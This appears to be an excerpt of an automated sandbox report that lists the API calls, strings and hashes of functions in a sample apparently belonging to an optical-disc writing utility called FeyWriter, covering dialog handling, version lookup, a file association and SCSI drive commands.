SendMessageW.USER32(00000000,000000C5,00000024,00000000), ref: 004604C9
GetDlgItem.USER32(?,0000043F), ref: 004604D4
SendMessageW.USER32(00000000,000000C5,00000024,00000000), ref: 004604E0
SetDlgItemTextW.USER32(?,00000434,004EEC94), ref: 004604F6
SetDlgItemTextW.USER32(?,00000436,004EED94), ref: 00460506
SetDlgItemTextW.USER32(?,00000437,004EEE94), ref: 00460516
SetDlgItemTextW.USER32(?,00000438,004EEF94), ref: 00460526
SetDlgItemTextW.USER32(?,0000043D,004EF094), ref: 00460536
SetDlgItemTextW.USER32(?,0000043E,004EF0DE), ref: 00460546
SetDlgItemTextW.USER32(?,0000043F,004EF128), ref: 00460556

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$MessageSendText
String ID:
API String ID: 3392263854-0
Opcode ID: 34a89eb6f0f353a10ff8cd64b0a61ffeb27af75714c97b5e6df5b77564cd4b82
Instruction ID: 48fa59ca95c186e3ca52edefb1bfdea1f740e2eae6b77fc4994c42865e5a8e60
Opcode Fuzzy Hash: 34a89eb6f0f353a10ff8cd64b0a61ffeb27af75714c97b5e6df5b77564cd4b82
Instruction Fuzzy Hash: 6E311EB578174476E130A7B68D8AF17A29C9BE8F01F518919B359AB5C4C9F8F500CA28

Function 0041A900 Relevance: 31.6, APIs: 21, Instructions: 94windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041A912
GetDlgItem.USER32(?,000004A4), ref: 0041A92B
EnableWindow.USER32(00000000,00000000), ref: 0041A936
GetDlgItem.USER32(?,000004A7), ref: 0041A941
EnableWindow.USER32(00000000,00000001), ref: 0041A946
GetDlgItem.USER32(?,000004A6), ref: 0041A951
EnableWindow.USER32(00000000,00000001), ref: 0041A956
GetDlgItem.USER32(?,000004A9), ref: 0041A961
EnableWindow.USER32(00000000,00000001), ref: 0041A966
GetDlgItem.USER32(?,000004A8), ref: 0041A971
EnableWindow.USER32(00000000,00000001), ref: 0041A976
GetDlgItem.USER32(?,000004A4), ref: 0041A984
EnableWindow.USER32(00000000,00000001), ref: 0041A98F
GetDlgItem.USER32(?,000004A7), ref: 0041A99A
EnableWindow.USER32(00000000,00000000), ref: 0041A99F
GetDlgItem.USER32(?,000004A6), ref: 0041A9AA
EnableWindow.USER32(00000000,00000000), ref: 0041A9AF
GetDlgItem.USER32(?,000004A9), ref: 0041A9BA
EnableWindow.USER32(00000000,00000000), ref: 0041A9BF
GetDlgItem.USER32(?,000004A8), ref: 0041A9CA
EnableWindow.USER32(00000000,00000000), ref: 0041A9CF

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: EnableItemWindow$MessageSend
String ID:
API String ID: 2057123791-0
Opcode ID: da56883981b67c1cb044787a529ccc92339e083f6992c2ef2728505a234bde6d
Instruction ID: 69c32b13d808256d720c8b50f32c097c834430065d08135454537ef66f78ae61
Opcode Fuzzy Hash: da56883981b67c1cb044787a529ccc92339e083f6992c2ef2728505a234bde6d
Instruction Fuzzy Hash: CA21EFB67903047BE530A7B6DD89F5BA79DAFC9F10F118C19B385DB1C0C9B5E4008A68

Function 0041C190 Relevance: 30.2, APIs: 20, Instructions: 239windowstringCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,0000003F), ref: 0041C1B2
_swscanf.LIBCMT ref: 0041C1CF
IsDlgButtonChecked.USER32(?,00000469), ref: 0041C1FA
IsDlgButtonChecked.USER32(?,000004AD), ref: 0041C211
IsDlgButtonChecked.USER32(?,000003F7), ref: 0041C228
IsDlgButtonChecked.USER32(?,000003F8), ref: 0041C23E
IsDlgButtonChecked.USER32(?,0000041C), ref: 0041C255
IsDlgButtonChecked.USER32(?,0000041D), ref: 0041C26C
IsDlgButtonChecked.USER32(?,0000041E), ref: 0041C282
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041C2A3
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0041C2B1
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0041C2C5
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0041C2D3
GetDlgItemTextW.USER32(?,00000419,?,00000020), ref: 0041C2EA
lstrcmpW.KERNEL32(?,00000000), ref: 0041C306
lstrcmpW.KERNEL32(?,00000000), ref: 0041C343

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ButtonChecked$MessageSend$Textlstrcmp$ItemWindow_swscanf
String ID:
API String ID: 3461227382-0
Opcode ID: 83cf337b0a894bd7527abb127ba7ef357653389c92c40b70e9288165982a8941
Instruction ID: df15c4b0595f6507d470328726ad4c7988fe3cb4fc14f965c5a77fd9d8b9160a
Opcode Fuzzy Hash: 83cf337b0a894bd7527abb127ba7ef357653389c92c40b70e9288165982a8941
Instruction Fuzzy Hash: 0081C6B6A44340AFE310DB75DD92F9B37D4AF98700F004A2EF2568B2D1DA75E504CB5A

Function 004448F0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 166timeCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00444910

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,000003F9), ref: 0044493D
GetDlgItem.USER32(?,000003FA), ref: 0044494A

Part of subcall function 00439F20: SendMessageW.USER32(?,000000F4,?,00000001), ref: 00439F8A

Part of subcall function 00443560: Concurrency::details::ResourceManager::SafeReference.LIBCMTD ref: 0044356A

GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,000003FA,?,000003F9), ref: 00444978
GetFileVersionInfoSizeW.VERSION(?,000003F9,?,000003FA,?,000003F9), ref: 0044498B
GetFileVersionInfoW.VERSION(?,00000000,?,00000000), ref: 004449B7
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,00000000,?,00000000), ref: 004449D0
VerQueryValueW.VERSION(00000000,?,?,?,?,00000000,?,00000000), ref: 00444A0A
GetLocalTime.KERNEL32(?), ref: 00444A4A
GetDateFormatW.KERNEL32(00000400,00000000,?,dddd, MMMM dd yyyy ,?,00000040), ref: 00444A68

Strings

\StringFileInfo\%04x%04x\FileVersion, xrefs: 004449E9
Versions: MSW = %d.%d, IE = %d.%d, CC = %d.%d., xrefs: 00444AD3
\VarFileInfo\Translation, xrefs: 004449CA
FeyWriter version %s, xrefs: 00444A1A
dddd, MMMM dd yyyy , xrefs: 00444A57
(x86), xrefs: 00444A3A
Started: %s%.2d:%.2d:%.2d., xrefs: 00444A8C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: FileInfoWindow$ItemLongParentQueryValueVersion$Concurrency::details::DateFormatLocalManager::MessageModuleNameParametersRectReferenceResourceSafeSendSizeSystemTime
String ID: (x86)$FeyWriter version %s$Started: %s%.2d:%.2d:%.2d.$Versions: MSW = %d.%d, IE = %d.%d, CC = %d.%d.$\StringFileInfo\%04x%04x\FileVersion$\VarFileInfo\Translation$dddd, MMMM dd yyyy
API String ID: 2131516572-3422947948
Opcode ID: 067a23f0bd43ecff7ea44c699fee4e4fa1b7c24abc9e7e80623df7cc5d8d4865
Instruction ID: f7b74a9b2ce4301f772a4b80f4aedd1df1365de17a97f4401cf9d7eb600d5aee
Opcode Fuzzy Hash: 067a23f0bd43ecff7ea44c699fee4e4fa1b7c24abc9e7e80623df7cc5d8d4865
Instruction Fuzzy Hash: BB517DB5244301AFD314DB54CC82FBB73E8EBD8704F04491EB68A87291EB78A945CB66

Function 0041F0F0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 185stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00462EA0: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,000F003F,?,?,?,?,0041EF6E,?,00000000), ref: 00462EB8

Part of subcall function 00462F90: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,AD5E0258,0041EF8E,004C49AC,?,00000080,?,00000000), ref: 00462FAF

lstrcmpW.KERNEL32(?,004C49AC,004C49AC,?,00000080,?,00000001), ref: 0041F19B
lstrcmpW.KERNEL32(?,?,004C49AC,?,00000080,?,00000001), ref: 0041F1A7
lstrlenW.KERNEL32(?), ref: 0041F1B8
lstrlenW.KERNEL32(?,?,00000001,004C49AC,?,00000000), ref: 0041F1EA
lstrcpyW.KERNEL32(?,?), ref: 0041F25F
lstrcatW.KERNEL32(?,\shell\open\command), ref: 0041F274
lstrcpyW.KERNEL32(?,004C4C54,?,00000001), ref: 0041F29E
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 0041F2B5
lstrcatW.KERNEL32(?," %1), ref: 0041F2C4
lstrcpyW.KERNEL32(?,?,004C49AC,?,00000208), ref: 0041F2FF
lstrcatW.KERNEL32(?,\DefaultIcon), ref: 0041F30E
GetModuleFileNameW.KERNEL32(00000000,?,00000103,?,00000001), ref: 0041F33A
lstrcatW.KERNEL32(?,004C4C80), ref: 0041F349

Strings

" %1, xrefs: 0041F2B7
\shell\open\command, xrefs: 0041F267
\DefaultIcon, xrefs: 0041F301

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: lstrcat$lstrcpy$FileModuleNamelstrcmplstrlen$OpenQueryValue
String ID: " %1$\DefaultIcon$\shell\open\command
API String ID: 4111329030-1363797410
Opcode ID: a1af5b6cbec15f98ca5b56ce2cf58d7b7bab02ec5eb0060465488e71d72a8254
Instruction ID: d65a7c12c263410fdd6cef597838adfb462bc8755a54c224fe016bbe51f79b9d
Opcode Fuzzy Hash: a1af5b6cbec15f98ca5b56ce2cf58d7b7bab02ec5eb0060465488e71d72a8254
Instruction Fuzzy Hash: 3451C375204300AED764DF60DD92FEB73A8EFC4714F40092EB594531D0EBB99909CA6B

Function 00463140 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 146windowstringCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0046314E

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

GetDlgItem.USER32(?,0000048D), ref: 0046316B
SendMessageW.USER32(00000000,000000C5,00000103,00000000), ref: 00463180
SetDlgItemTextW.USER32(?,0000048D,004EF464), ref: 00463190
GetDlgItem.USER32(00000000,0000048F), ref: 0046319F
SendMessageW.USER32(00000000,0000014B,00000000,00000000), ref: 004631B0
SendMessageW.USER32(?,00000143,00000000,Wave), ref: 004631C2
lstrcmpW.KERNEL32(00000000,?,0000048D,004EF464,?,0000048D), ref: 004631FA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00463265
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 00463298
SendMessageW.USER32(?,00000151,-00000001), ref: 004632AC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004632D2
GetDlgItem.USER32(?,00000490), ref: 004632DD
EnableWindow.USER32(00000000,00000000), ref: 004632E6

Strings

Wave, xrefs: 004631B5
.wav, xrefs: 004631F0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$ItemWindow$LongParent$EnableInfoParametersRectSystemTextlstrcmp
String ID: .wav$Wave
API String ID: 2809121714-2502306036
Opcode ID: 8dd8e2fd5b16b787b4757505828e89ef28c7fd12aa98f6c4469b0845cdad8a42
Instruction ID: 445cd0e6eab982b4d28af0863be38582853d3fcac59beebcf15f8ad427b02b58
Opcode Fuzzy Hash: 8dd8e2fd5b16b787b4757505828e89ef28c7fd12aa98f6c4469b0845cdad8a42
Instruction Fuzzy Hash: BC418F747403496BD720DFA9DDD6F6AB3A9BB8C700F10451DF6099B2E0DAB8E904CB18

Function 0041B250 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 100windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0041B265
SendMessageW.USER32(00000000,00008001,00000000,00000000), ref: 0041B275
GetDlgItem.USER32(?,00000420), ref: 0041B2A7
EnableWindow.USER32(00000000,00000000), ref: 0041B2B8
GetDlgItem.USER32(?,00000423), ref: 0041B2D5
EnableWindow.USER32(00000000,00000000), ref: 0041B2E2
GetDlgItem.USER32(?,00000424), ref: 0041B2FF
EnableWindow.USER32(00000000,00000000), ref: 0041B30C
GetDlgItem.USER32(?,?), ref: 0041B32C
EnableWindow.USER32(00000000,?), ref: 0041B335
GetDlgItem.USER32(?,00000426), ref: 0041B340
EnableWindow.USER32(00000000,?), ref: 0041B344

Strings

SWABAUDIO, xrefs: 0041B288
FORCESPEED, xrefs: 0041B2E4
AUDIOMASTER, xrefs: 0041B2BA
VARIREC, xrefs: 0041B30E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: EnableItemWindow$MessageParentSend
String ID: AUDIOMASTER$FORCESPEED$SWABAUDIO$VARIREC
API String ID: 1998592702-2963754659
Opcode ID: 5749e165e5468aaa56eb7f261fe76b4f761601f98d99a3d8a89f90391ccc630b
Instruction ID: 081b29b7018803370f00e4d01788a2b01002cc158e953a1f0fe510c10fa26fb2
Opcode Fuzzy Hash: 5749e165e5468aaa56eb7f261fe76b4f761601f98d99a3d8a89f90391ccc630b
Instruction Fuzzy Hash: 1021D6B16043057BD7009B75AD96F2BB7ECEFC8B05F00882EB64593281DB78EC10866D

Function 0045A890 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 226windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0045A8B1
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 0045A8BB
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0045A8D0
SendMessageW.USER32 ref: 0045A92D
SendMessageW.USER32 ref: 0045A985
SendMessageW.USER32 ref: 0045A9DD
SendMessageW.USER32 ref: 0045AA35
SendMessageW.USER32 ref: 0045AA8D
EnableMenuItem.USER32(?,00008013,00000000), ref: 0045AAC1
EnableMenuItem.USER32(?,00008016,00000001), ref: 0045AAF8
GetWindowLongW.USER32(?,000000F0), ref: 0045AB25
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0045AB39
SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0045AB4C
SendMessageW.USER32(00000000,0000800E,00000000,00000000), ref: 0045AB56

Strings

x, xrefs: 0045AA79

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$EnableItemLongMenuWindow
String ID: x
API String ID: 3381087704-2363233923
Opcode ID: 5aefc4b1441e1e040b0449b3aceaf05daa4082cb882c82d3c2629855de8c33e8
Instruction ID: 42f249837ea480be21cce4f1767dd4708d4166fd700114772d025afd0f1bbeb6
Opcode Fuzzy Hash: 5aefc4b1441e1e040b0449b3aceaf05daa4082cb882c82d3c2629855de8c33e8
Instruction Fuzzy Hash: AB812EB0908304AFE750DF69C885A1BBBE8FB8C748F004A2EF599D7291E7749944CF56

Function 0042E510 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 219synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042E828
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042E8A1
ResetEvent.KERNEL32(00000000), ref: 0042E8AA
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0000005C,?,?,?), ref: 0042E8C8
CloseHandle.KERNEL32(00000000,?,00000000,0000005C,?,?,?), ref: 0042E8CF
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,0000005C,?,?,?), ref: 0042E8DC

Strings

0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X, xrefs: 0042EA12, 0042EA5D
0x%.2X, xrefs: 0042E959
Sense:0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X, xrefs: 0042E9BB
Error: SCSI command failed, returned: 0x%.2X., xrefs: 0042E922
,0x%.2X, xrefs: 0042E965
SendASPI32Command failed, status: 0x%.2X, last error: %d., xrefs: 0042E8E9
H, xrefs: 0042E894
CDB:, xrefs: 0042E931

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Event$CloseCreateErrorHandleLastObjectResetSingleWait_memset
String ID: 0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X$ CDB:$ Error: SCSI command failed, returned: 0x%.2X.$ SendASPI32Command failed, status: 0x%.2X, last error: %d.$ Sense:0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X,0x%.2X$,0x%.2X$0x%.2X$H
API String ID: 4199455821-1580387384
Opcode ID: a70e6b479b6c346108cad84873182ddf606e2325aa78295695c4bd3845a73468
Instruction ID: e78e319f0e8a545bdcdb5da7cfaa3ea6e41f1133b274f65adb4d41560dfa5001
Opcode Fuzzy Hash: a70e6b479b6c346108cad84873182ddf606e2325aa78295695c4bd3845a73468
Instruction Fuzzy Hash: F47124B160C3E06AD22197666C62B7FBFE86FCA701F84484FF5D542282C5AC8544DB7B

Function 0045AB60 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 201windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0045AB85
SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 0045AB8F
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0045ABA4
SendMessageW.USER32 ref: 0045AC01
SendMessageW.USER32 ref: 0045AC5C
SendMessageW.USER32 ref: 0045ACB7
SendMessageW.USER32 ref: 0045AD12
EnableMenuItem.USER32(?,00008013,00000001), ref: 0045AD45
EnableMenuItem.USER32(?,00008016,00000001), ref: 0045AD7C
GetWindowLongW.USER32(?,000000F0), ref: 0045ADA9
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045ADBD
SendMessageW.USER32(00000000,0000101F,00000000,00000000), ref: 0045ADD0
SendMessageW.USER32(00000000,0000800E,00000001,00000000), ref: 0045ADDB

Strings

<, xrefs: 0045ACA3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$EnableItemLongMenuWindow
String ID: <
API String ID: 3381087704-4251816714
Opcode ID: 2429c6ed43f7bf2766754cf228d67df618f6aec4af6645e0829ea7e579d9f10a
Instruction ID: 3a98479d05ffd58d4df1428bf47d315e52bfcaa3b72154a08487c0a7f6c2b4a5
Opcode Fuzzy Hash: 2429c6ed43f7bf2766754cf228d67df618f6aec4af6645e0829ea7e579d9f10a
